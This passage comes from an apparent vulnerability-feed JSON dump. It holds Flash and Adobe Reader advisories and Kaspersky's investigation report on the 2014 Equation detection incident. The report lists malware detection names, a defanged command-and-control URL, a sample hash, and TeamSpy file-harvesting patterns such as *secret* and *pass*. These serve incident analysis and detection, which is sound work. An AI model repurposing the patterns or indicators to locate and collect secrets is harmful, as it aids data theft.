These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-14, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2009-3793,\nCVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163,\nCVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169,\nCVE-2010-2170, CVE-2010-2171, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175,\nCVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2181,\nCVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186,\nCVE-2010-2187, CVE-2010-2188)\n\nAn input sanitization flaw was found in the way flash-plugin processed\ncertain URLs. An attacker could use this flaw to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a\nspecially-crafted web page. (CVE-2010-2179)\n\nA denial of service flaw was found in the way flash-plugin processed\ncertain SWF content. 
An attacker could use this flaw to create a\nspecially-crafted SWF file that would cause flash-plugin to crash.\n(CVE-2008-4546)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.1.53.64.\n", "modified": "2017-07-27T07:33:10", "published": "2010-06-11T04:00:00", "id": "RHSA-2010:0464", "href": "https://access.redhat.com/errata/RHSA-2010:0464", "type": "redhat", "title": "(RHSA-2010:0464) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2017-11-27T08:03:02", "bulletinFamily": "blog", "cvelist": ["CVE-2009-3869", "CVE-2010-0094", "CVE-2010-0188", "CVE-2010-0480", "CVE-2010-0840", "CVE-2010-0842", "CVE-2010-1297", "CVE-2010-3563", "CVE-2010-3653", "CVE-2010-3654", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-3400", "CVE-2011-3544", "CVE-2012-0507", "CVE-2012-0754", "CVE-2012-1723", "CVE-2012-4681", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-2171", "CVE-2013-2423"], "description": "\n\n## Background\n\nIn early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee's home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:\n\n 1. Was our software used outside of its intended functionality to pull classified information from a person's computer?\n 2. When did this incident occur?\n 3. Who was this person?\n 4. Was there actually classified information found on the system inadvertently?\n 5. 
If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n 6. Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n 7. What types of files were gathered from the supposed system?\n 8. Do we have any indication the user was subsequently \"hacked\" by Russian hackers and data exfiltrated?\n 9. Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n 10. Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?\n\nAnswering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as food for thought to everyone else. To further support the objectivity of the internal investigation, we ran our investigation using multiple analysts of non-Russian origin working outside of Russia to avoid even potential accusations of influence.\n\n## The Wall Street Journal Article\n\nThe article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:\n\n * The information \"stolen\" provides details on how the U.S. 
penetrates foreign computer networks and defends against cyberattacks.\n * A National Security Agency contractor removed the highly classified material and put it on his home computer.\n * The data ended up in the hands of so called \"Russian hackers\" after the files were detected using Kaspersky Lab software.\n * The incident occurred in 2015 but wasn't discovered until spring of last year [2016].\n * The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.\n * \"Hackers\" homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.\n\n## Beginning of Search\n\nHaving all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.\n\nThe first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including \"Equestre\", \"Equation\", \"Grayfish\", \"Fanny\", \"DoubleFantasy\" given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as \"HEUR:Trojan.Win32.Equestre.*\". Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. 
This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don't have all the details.\n\nBelow is a list of all hits in September for an \"Equestre\" signature, sorted by least amount to most. You can quickly identify the problem signature(s) mentioned above.\n\nDetection name (silent) | Count \n---|--- \nHEUR:Trojan.Win32.Equestre.u | 1 \nHEUR:Trojan.Win32.Equestre.gen.422674 | 3 \nHEUR:Trojan.Win32.Equestre.gen.422683 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427692 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427696 | 4 \nHEUR:Trojan.Win32.Equestre.gen.446160 | 6 \nHEUR:Trojan.Win32.Equestre.gen.446979 | 7 \nHEUR:Trojan.Win32.Equestre.g | 8 \nHEUR:Trojan.Win32.Equestre.ab | 9 \nHEUR:Trojan.Win32.Equestre.y | 9 \nHEUR:Trojan.Win32.Equestre.l | 9 \nHEUR:Trojan.Win32.Equestre.ad | 9 \nHEUR:Trojan.Win32.Equestre.t | 9 \nHEUR:Trojan.Win32.Equestre.e | 10 \nHEUR:Trojan.Win32.Equestre.v | 14 \nHEUR:Trojan.Win32.Equestre.gen.427697 | 18 \nHEUR:Trojan.Win32.Equestre.gen.424814 | 18 \nHEUR:Trojan.Win32.Equestre.s | 19 \nHEUR:Trojan.Win32.Equestre.x | 20 \nHEUR:Trojan.Win32.Equestre.i | 24 \nHEUR:Trojan.Win32.Equestre.p | 24 \nHEUR:Trojan.Win32.Equestre.q | 24 \nHEUR:Trojan.Win32.Equestre.gen.446142 | 34 \nHEUR:Trojan.Win32.Equestre.d | 39 \nHEUR:Trojan.Win32.Equestre.j | 40 \nHEUR:Trojan.Win32.Equestre.gen.427734 | 53 \nHEUR:Trojan.Win32.Equestre.gen.446149 | 66 \nHEUR:Trojan.Win32.Equestre.ag | 142 \nHEUR:Trojan.Win32.Equestre.b | 145 \nHEUR:Trojan.Win32.Equestre.h | 310 \nHEUR:Trojan.Win32.Equestre.gen.422682 | 737 \nHEUR:Trojan.Win32.Equestre.z | 1389 \nHEUR:Trojan.Win32.Equestre.af | 2733 
\nHEUR:Trojan.Win32.Equestre.c | 3792 \nHEUR:Trojan.Win32.Equestre.m | 4061 \nHEUR:Trojan.Win32.Equestre.k | 6720 \nHEUR:Trojan.Win32.Equestre.exvf.1 | 6726 \nHEUR:Trojan.Win32.Equestre.w | 6742 \nHEUR:Trojan.Win32.Equestre.f | 9494 \nHEUR:Trojan.Win32.Equestre.gen.446131 | 26329 \nHEUR:Trojan.Win32.Equestre.aa | 87527 \nHEUR:Trojan.Win32.Equestre.gen.447002 | 547349 \nHEUR:Trojan.Win32.Equestre.gen.447013 | 1472919 \n \nTaking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature \"HEUR:Trojan.Win32.Equestre.m\" and a 7zip archive (referred below as \"[undisclosed].7z\"). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. 
Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:\n\nHEUR:Trojan.Win32.Equestre.e \nHEUR:Trojan.Win32.Equestre.exvf.1 \nHEUR:Trojan.Win32.Equestre.g \nHEUR:Trojan.Win32.Equestre.gen.424814 \nHEUR:Trojan.Win32.Equestre.gen.427693 \nHEUR:Trojan.Win32.Equestre.gen.427696 \nHEUR:Trojan.Win32.Equestre.gen.427697 \nHEUR:Trojan.Win32.Equestre.gen.427734 \nHEUR:Trojan.Win32.Equestre.gen.446142 \nHEUR:Trojan.Win32.Equestre.gen.446993 \nHEUR:Trojan.Win32.Equestre.gen.465795 \nHEUR:Trojan.Win32.Equestre.i \nHEUR:Trojan.Win32.Equestre.j \nHEUR:Trojan.Win32.Equestre.m \nHEUR:Trojan.Win32.Equestre.p \nHEUR:Trojan.Win32.Equestre.q \nHEUR:Trojan.Win32.Equestre.x \nHEUR:Trojan.Win32.GrayFish.e \nHEUR:Trojan.Win32.GrayFish.f\n\nIn total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users' privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company's reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.\n\nThe file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. 
At this point in time, we felt confident we had found the source of the story fed to the Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.\n\nOur next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.\n\nUpon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named \"[undisclosed].7z\", was removed from storage. Based on the description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold: first, we don't need anything other than malware binaries to improve protection of our customers, and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not be consumed even to produce detection signatures based on descriptions.\n\nThis concern was later translated into a policy for all malware analysts, who are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. 
Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively \"detected on\" during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).\n\n## An Interesting Twist\n\nDuring the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the \"setup.exe\" file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 - for [detection coverage, see this VirusTotal link](<https://www.virustotal.com/#/file/6bcd591540dce8e0cef7b2dc6a378a10d79f94c3217bca5f05db3c24c2036340/detection>)) .\n\nLooking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of \"Office-2013-PPVL-x64-en-US-Oct2013.iso\". 
What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as \"kms.exe\" (a name of a popular pirated software activation tool), and \"kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions\". Kaspersky Lab products detected the malware with the verdict **Backdoor.Win32.Mokes.hvl**.\n\nAt a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL \"http://xvidmovies[.]in/dir/index.php\". Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It's important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.\n\nTo install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. **Executing the malware would not have been possible with the antivirus enabled**.\n\nAdditionally, there also may have been other malware from different downloads that we were unaware of during this time frame. 
Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:\n\nBackdoor.OSX.Getshell.k \nBackdoor.Win32.Mokes.hvl \nBackdoor.Win32.Shiz.gpmv \nBackdoor.Win32.Swrort.dbq \nDangerousObject.Multi.Chupitio.a \nExploit.Java.Agent.f \nExploit.Java.CVE-2009-3869.a \nExploit.Java.CVE-2010-0094.bb \nExploit.Java.CVE-2010-0094.e \nExploit.Java.CVE-2010-0094.q \nExploit.Java.CVE-2010-0840.gm \nExploit.Java.CVE-2010-0842.d \nExploit.Java.CVE-2010-3563.a \nExploit.Java.CVE-2011-3544.ac \nExploit.Java.CVE-2012-0507.al \nExploit.Java.CVE-2012-0507.je \nExploit.Java.CVE-2012-1723.ad \nExploit.Java.CVE-2012-4681.l \nExploit.JS.Aurora.a \nExploit.MSVisio.CVE-2011-3400.a \nExploit.Multi.CVE-2012-0754.a \nExploit.OSX.Smid.b \nExploit.SWF.CVE-2010-1297.c \nExploit.SWF.CVE-2011-0609.c \nExploit.SWF.CVE-2011-0611.ae \nExploit.SWF.CVE-2011-0611.cd \nExploit.Win32.CVE-2010-0188.a \nExploit.Win32.CVE-2010-0480.a \nExploit.Win32.CVE-2010-3653.a \nExploit.Win32.CVE-2010-3654.a \nHackTool.Win32.Agent.vhs \nHackTool.Win32.PWDump.a \nHackTool.Win32.WinCred.e \nHackTool.Win32.WinCred.i \nHackTool.Win64.Agent.b \nHackTool.Win64.WinCred.a \nHackTool.Win64.WinCred.c \nHEUR:Exploit.FreeBSD.CVE-2013-2171.a \nHEUR:Exploit.Java.CVE-2012-1723.gen \nHEUR:Exploit.Java.CVE-2013-0422.gen \nHEUR:Exploit.Java.CVE-2013-0431.gen \nHEUR:Exploit.Java.CVE-2013-2423.gen \nHEUR:Exploit.Java.Generic \nHEUR:Exploit.Script.Generic \nHEUR:HackTool.AndroidOS.Revtcp.a \nHEUR:Trojan-Downloader.Script.Generic \nHEUR:Trojan-FakeAV.Win32.Onescan.gen \nHEUR:Trojan.Java.Generic \nHEUR:Trojan.Script.Generic \nHEUR:Trojan.Win32.Generic \nHoax.Win32.ArchSMS.cbzph \nKHSE:Exploit.PDF.Generic.a \nnot-a-virus:AdWare.JS.MultiPlug.z \nnot-a-virus:AdWare.NSIS.Agent.bx \nnot-a-virus:AdWare.Win32.Agent.allm \nnot-a-virus:AdWare.Win32.AirAdInstaller.cdgd \nnot-a-virus:AdWare.Win32.AirAdInstaller.emlr \nnot-a-virus:AdWare.Win32.Amonetize.fay \nnot-a-virus:AdWare.Win32.DomaIQ.cjw 
\nnot-a-virus:AdWare.Win32.Fiseria.t \nnot-a-virus:AdWare.Win32.iBryte.jda \nnot-a-virus:AdWare.Win32.Inffinity.yas \nnot-a-virus:AdWare.Win32.MultiPlug.nbjr \nnot-a-virus:AdWare.Win32.Shopper.adw \nnot-a-virus:Downloader.NSIS.Agent.am \nnot-a-virus:Downloader.NSIS.Agent.an \nnot-a-virus:Downloader.NSIS.Agent.as \nnot-a-virus:Downloader.NSIS.Agent.go \nnot-a-virus:Downloader.NSIS.Agent.lf \nnot-a-virus:Downloader.NSIS.OutBrowse.a \nnot-a-virus:Downloader.Win32.Agent.bxib \nnot-a-virus:Monitor.Win32.Hooker.br \nnot-a-virus:Monitor.Win32.KeyLogger.xh \nnot-a-virus:PSWTool.Win32.Cain.bp \nnot-a-virus:PSWTool.Win32.Cain.bq \nnot-a-virus:PSWTool.Win32.CredDump.a \nnot-a-virus:PSWTool.Win32.FirePass.ia \nnot-a-virus:PSWTool.Win32.NetPass.amv \nnot-a-virus:PSWTool.Win32.PWDump.3 \nnot-a-virus:PSWTool.Win32.PWDump.4 \nnot-a-virus:PSWTool.Win32.PWDump.5 \nnot-a-virus:PSWTool.Win32.PWDump.ar \nnot-a-virus:PSWTool.Win32.PWDump.at \nnot-a-virus:PSWTool.Win32.PWDump.bey \nnot-a-virus:PSWTool.Win32.PWDump.bkr \nnot-a-virus:PSWTool.Win32.PWDump.bve \nnot-a-virus:PSWTool.Win32.PWDump.f \nnot-a-virus:PSWTool.Win32.PWDump.sa \nnot-a-virus:PSWTool.Win32.PWDump.yx \nnot-a-virus:RiskTool.Win32.WinCred.gen \nnot-a-virus:RiskTool.Win64.WinCred.a \nnot-a-virus:WebToolbar.JS.Condonit.a \nnot-a-virus:WebToolbar.Win32.Agent.avl \nnot-a-virus:WebToolbar.Win32.Cossder.updv \nnot-a-virus:WebToolbar.Win32.Cossder.uubg \nnot-a-virus:WebToolbar.Win32.MyWebSearch.sv \nPDM:Trojan.Win32.Badur.a \nTrojan-Banker.Win32.Agent.kan \nTrojan-Downloader.Win32.Genome.jlcv \nTrojan-Dropper.Win32.Injector.jqmj \nTrojan-Dropper.Win32.Injector.ktep \nTrojan-FakeAV.Win64.Agent.j \nTrojan-Ransom.Win32.ZedoPoo.phd \nTrojan.Java.Agent.at \nTrojan.Win32.Adond.lbgp \nTrojan.Win32.Buzus.umzt \nTrojan.Win32.Buzus.uuzf \nTrojan.Win32.Diple.fygv \nTrojan.Win32.Genome.amqoa \nTrojan.Win32.Genome.amtor \nTrojan.Win32.Genome.kpzv \nTrojan.Win32.Genome.ngd \nTrojan.Win32.Inject.euxi \nTrojan.Win32.Starter.ceg 
\nTrojan.Win32.Swisyn.aaig \nUDS:DangerousObject.Multi.Generic \nUFO:(blocked) \nVirTool.Win32.Rootkit \nVirTool.Win32.Topo.12 \nVirus.Win32.Suspic.gen \nWMUF:(blocked)\n\n## Conclusions\n\nAt this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:\n\n**Q1** - Was our software used outside of its intended functionality to pull classified information from a person's computer?\n\n**A1** - The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.\n\n**Q2** - When did this incident occur?\n\n**A2** - In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.\n\n**Q3** - Who was this person?\n\n**A3** - Because our software anonymizes certain aspects of users' information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.\n\n**Q4** - Was there actually classified information found on the system inadvertently?\n\n**A4** - What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on an Equation specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.\n\n**Q5** - If classified information was pulled back, what happened to said data after? 
Was it handled appropriately?\n\n**A5** - After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. \u2013 statistics and some metadata). We cannot assess whether the data was \"handled appropriately\" (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.\n\n**Q6 \u2013 **Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n\n**A6 - **The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.\n\n**Q7** - What types of files were gathered from the supposed system?\n\n**A7** - Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.\n\n**Q8** - Do we have any indication the user was subsequently \"hacked\" by Russian actors and data exfiltrated?\n\n**A8** - Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. 
We assess this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as \"Smoke Bot\" or \"Smoke Loader\") allegedly created by a Russian hacker in 2011 and made available on [Russian underground forums](<http://xaker.name/threads/22008/>) for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name \"Zhou Lou\", from Hunan, using the e-mail address \"zhoulu823@gmail.com\". We are still working on this and further details on this malware might be made available later as a separate research paper.\n\nOf course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given the system owner's potential clearance level, the user could have been a prime target of nation states. Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.\n\n**Q9** - Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n\n**A9** - Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. 
This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user's computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.\n\nIn relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.\n\n**Q10** - Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?\n\n**A10** - We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. 
However, during this sweep we discovered something interesting in relation to the TeamSpy research that we published earlier (for more details we recommend checking the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that were of interest to the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string patterns based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning \"secret\" in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:\n\n * *saidumlo*\n * *secret*.*\n * *.xls\n * *.pdf\n * *.pgp\n * *pass*.*\n\nThese strings had to be located in the body of the malware dump from a sandbox-processed sample. In addition, the malware analyst included another indicator to avoid false positives: a path where the malware dropper stored dropped files: ProgramData\\Adobe\\AdobeARM.\n\nOne could theorize about an intelligence operator monitoring a malware analyst's work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is a possibility that, for an attacker looking for anything that can expose our company from a negative side, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, these strings could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.\n\nMany people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. 
It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.\n\n[ **Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident](<https://securelist.com/files/2017/11/Appendix_Mokes-SmokeBot_analysis.pdf>)", "modified": "2017-11-16T10:00:34", "published": "2017-11-16T10:00:34", "href": "https://securelist.com/investigation-report-for-the-september-2014-equation-malware-detection-incident-in-the-us/83210/", "id": "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "type": "securelist", "title": "Investigation Report for the September 2014 Equation malware detection incident in the US", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "\nAdobe Product Security Incident Response Team reports:\n\nCritical vulnerabilities have been identified in Adobe\n\t Flash Player version 10.0.45.2 and earlier. 
These\n\t vulnerabilities could cause the application to crash and\n\t could potentially allow an attacker to take control of the\n\t affected system.\n\n", "edition": 4, "modified": "2008-10-02T00:00:00", "published": "2008-10-02T00:00:00", "id": "144E524A-77EB-11DF-AE06-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/144e524a-77eb-11df-ae06-001b2134ef46.html", "title": "linux-flashplugin -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:04", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1295", "CVE-2010-0196", "CVE-2010-2211", "CVE-2010-0192", "CVE-2010-2201", "CVE-2009-3953", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-0204", "CVE-2010-0190", "CVE-2010-2207", "CVE-2010-0186", "CVE-2010-0198", "CVE-2010-2203", "CVE-2010-0193", "CVE-2010-2210", "CVE-2009-4324", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-0188", "CVE-2010-2204", "CVE-2010-0194", "CVE-2010-1285", "CVE-2010-0191", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-0195", "CVE-2010-0201", "CVE-2010-0197", "CVE-2010-2208", "CVE-2010-2168", "CVE-2010-0203", "CVE-2010-1241", "CVE-2010-0199", "CVE-2010-0202"], "description": "### Background\n\nAdobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Reader. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. \n\n### Impact\n\nA remote attacker might entice a user to open a specially crafted PDF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or bypass intended sandbox restrictions, make cross-domain requests, inject arbitrary web script or HTML, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-9.3.4\"", "edition": 1, "modified": "2010-09-07T00:00:00", "published": "2010-09-07T00:00:00", "id": "GLSA-201009-05", "href": "https://security.gentoo.org/glsa/201009-05", "type": "gentoo", "title": "Adobe Reader: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", 